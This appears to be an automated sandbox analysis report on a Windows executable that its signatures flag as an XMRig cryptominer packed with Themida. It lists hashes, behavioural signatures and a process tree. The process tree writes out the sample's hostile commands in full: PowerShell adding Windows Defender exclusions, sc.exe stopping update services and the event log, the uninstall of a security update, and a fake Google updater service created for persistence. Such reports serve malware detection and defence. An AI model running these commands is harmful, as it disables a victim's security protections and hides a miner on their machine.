Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 09:23

General

  • Target

    5d3af8278f2832d439f72b85639b35c99cc50436dff6fc051456c9fa5443d155.exe

  • Size

    8.2MB

  • MD5

    880c9e3235130a6aaaa3ec25be18bdb4

  • SHA1

    e68f23fc85d390623ba8763afc8af22424153d74

  • SHA256

    5d3af8278f2832d439f72b85639b35c99cc50436dff6fc051456c9fa5443d155

  • SHA512

    8473c46b4c1f7278e3d50ce40ebe25e064f0eae81a9bf31399a3dfeae05dfedf1885e379c0303831c3226d24e66f59cd76590e2713003c86c93e979e01d70b75

  • SSDEEP

    196608:uEEVzloWL4sYCK0to58wBO537vWoWRQwcQIMatadu1bEnulj3rOeL8:MloWL4zCjth37v/t6u18Cj3qe

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 15 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d3af8278f2832d439f72b85639b35c99cc50436dff6fc051456c9fa5443d155.exe
    "C:\Users\Admin\AppData\Local\Temp\5d3af8278f2832d439f72b85639b35c99cc50436dff6fc051456c9fa5443d155.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Drops file in Drivers directory
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Drops file in System32 directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:1964
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:900
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2856
      • C:\Windows\system32\wusa.exe
        wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Drops file in Windows directory
        PID:2744
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      2⤵
      • Launches sc.exe
      PID:2888
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      2⤵
      • Launches sc.exe
      PID:2816
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      2⤵
      • Launches sc.exe
      PID:2564
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      2⤵
      • Launches sc.exe
      PID:2648
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      2⤵
      • Launches sc.exe
      PID:2748
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2860
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2612
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2608
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2628
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
      2⤵
      • Launches sc.exe
      PID:2676
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
      2⤵
      • Launches sc.exe
      PID:1712
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      2⤵
      • Launches sc.exe
      PID:1128
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
      2⤵
      • Launches sc.exe
      PID:1544
  • C:\ProgramData\Google\Chrome\updater.exe
    C:\ProgramData\Google\Chrome\updater.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Drops file in Drivers directory
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Checks whether UAC is enabled
    • Drops file in System32 directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1888
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Windows\system32\wusa.exe
        wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Drops file in Windows directory
        PID:1996
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      2⤵
      • Launches sc.exe
      PID:1556
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      2⤵
      • Launches sc.exe
      PID:2148
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      2⤵
      • Launches sc.exe
      PID:1668
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      2⤵
      • Launches sc.exe
      PID:1812
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      2⤵
      • Launches sc.exe
      PID:684
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:380
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2092
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:628
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:1404
    • C:\Windows\system32\conhost.exe
      C:\Windows\system32\conhost.exe
      2⤵
        PID:1792
      • C:\Windows\explorer.exe
        explorer.exe
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2568

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\system32\drivers\etc\hosts

      Filesize

      2KB

      MD5

      3e9af076957c5b2f9c9ce5ec994bea05

      SHA1

      a8c7326f6bceffaeed1c2bb8d7165e56497965fe

      SHA256

      e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

      SHA512

      933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

    • \ProgramData\Google\Chrome\updater.exe

      Filesize

      8.2MB

      MD5

      880c9e3235130a6aaaa3ec25be18bdb4

      SHA1

      e68f23fc85d390623ba8763afc8af22424153d74

      SHA256

      5d3af8278f2832d439f72b85639b35c99cc50436dff6fc051456c9fa5443d155

      SHA512

      8473c46b4c1f7278e3d50ce40ebe25e064f0eae81a9bf31399a3dfeae05dfedf1885e379c0303831c3226d24e66f59cd76590e2713003c86c93e979e01d70b75

    • memory/900-16-0x0000000001D60000-0x0000000001D68000-memory.dmp

      Filesize

      32KB

    • memory/900-18-0x0000000076D60000-0x0000000076F09000-memory.dmp

      Filesize

      1.7MB

    • memory/900-17-0x0000000076D60000-0x0000000076F09000-memory.dmp

      Filesize

      1.7MB

    • memory/900-15-0x0000000076D60000-0x0000000076F09000-memory.dmp

      Filesize

      1.7MB

    • memory/900-13-0x0000000076D60000-0x0000000076F09000-memory.dmp

      Filesize

      1.7MB

    • memory/900-12-0x0000000076D60000-0x0000000076F09000-memory.dmp

      Filesize

      1.7MB

    • memory/900-11-0x0000000076D60000-0x0000000076F09000-memory.dmp

      Filesize

      1.7MB

    • memory/900-14-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

      Filesize

      2.9MB

    • memory/1792-35-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/1792-34-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/1792-33-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/1792-40-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/1792-37-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/1792-36-0x0000000140000000-0x000000014000E000-memory.dmp

      Filesize

      56KB

    • memory/1888-30-0x0000000000950000-0x0000000000958000-memory.dmp

      Filesize

      32KB

    • memory/1888-29-0x0000000019F80000-0x000000001A262000-memory.dmp

      Filesize

      2.9MB

    • memory/1964-0-0x000000013FD90000-0x0000000140CC3000-memory.dmp

      Filesize

      15.2MB

    • memory/1964-1-0x000000013FD90000-0x0000000140CC3000-memory.dmp

      Filesize

      15.2MB

    • memory/1964-21-0x000000013FD90000-0x0000000140CC3000-memory.dmp

      Filesize

      15.2MB

    • memory/1964-3-0x000000013FD90000-0x0000000140CC3000-memory.dmp

      Filesize

      15.2MB

    • memory/1964-2-0x0000000076DB0000-0x0000000076DB2000-memory.dmp

      Filesize

      8KB

    • memory/1964-4-0x000000013FD90000-0x0000000140CC3000-memory.dmp

      Filesize

      15.2MB

    • memory/1964-5-0x000000013FD90000-0x0000000140CC3000-memory.dmp

      Filesize

      15.2MB

    • memory/2568-58-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-46-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-61-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-59-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-60-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-54-0x00000000000B0000-0x00000000000D0000-memory.dmp

      Filesize

      128KB

    • memory/2568-53-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-50-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-49-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-48-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-47-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-56-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-45-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-44-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-43-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-42-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2568-57-0x0000000140000000-0x000000014082C000-memory.dmp

      Filesize

      8.2MB

    • memory/2792-28-0x000000013F390000-0x00000001402C3000-memory.dmp

      Filesize

      15.2MB

    • memory/2792-55-0x000000013F390000-0x00000001402C3000-memory.dmp

      Filesize

      15.2MB

    • memory/2792-26-0x000000013F390000-0x00000001402C3000-memory.dmp

      Filesize

      15.2MB

    • memory/2792-25-0x000000013F390000-0x00000001402C3000-memory.dmp

      Filesize

      15.2MB

    • memory/2792-27-0x000000013F390000-0x00000001402C3000-memory.dmp

      Filesize

      15.2MB